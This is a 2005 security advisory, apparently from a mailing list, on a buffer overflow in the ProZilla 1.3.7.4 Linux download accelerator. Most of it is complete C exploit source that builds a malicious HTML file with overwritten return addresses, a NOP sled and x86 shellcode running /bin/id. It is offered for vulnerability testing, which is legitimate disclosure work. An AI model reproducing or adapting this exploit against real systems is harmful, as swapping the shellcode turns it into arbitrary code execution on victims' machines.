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[EXPL] ProZilla Buffer Overflow (Exploit)

Subject: [EXPL] ProZilla Buffer Overflow (Exploit)
Date: 6 Oct 2005 16:13:05 +0200
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  ProZilla Buffer Overflow (Exploit)
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SUMMARY

" <http://prozilla.genesys.ro/> ProZilla is a download accelerator for 
Linux which gives you a 200% to 300% improvement in your file downloading 
speeds. "

Prozilla does not validate length properly allowing attackers to cause the 
program to execute arbitrary code by overflowing an internal buffer, the 
following exploit code can be used to test your system for the mentioned 
vulnerability.

DETAILS

Vulnerable Systems:
 * Prozilla version 1.3.7.4

Exploit:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define OVERFLOW (1<<10)+32
#define SLEDSIZ (1<<10)
#define RETADDR 0x806977a+SLEDSIZ/2
#define OUTPUT "AdvResults.asp"

/*
* prozilla bug, found while auditing for gentoo bug #70090
* -taviso@gentoo.org
*/

/* execve() /bin/id */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
"\x9f\xcf\x2d\x8e";

int main(int argc, char **argv)
{
unsigned char *buf;
void *ret = (void *) RETADDR;
FILE *exploit;
int i;

exploit = fopen(OUTPUT, "w");
fprintf(exploit, "<PRE><A HREF=>");

buf = malloc(OVERFLOW);
for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
memcpy(buf + i, &ret, sizeof(void *));
fwrite(buf, OVERFLOW, 1, exploit);
fprintf(exploit, "</A><A HREF=></A><A HREF=></A></PRE>");
buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
free(buf);
fprintf(stderr, "[*] %s created.\n", OUTPUT);
return 0;
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:taviso@gentoo.org> taviso.



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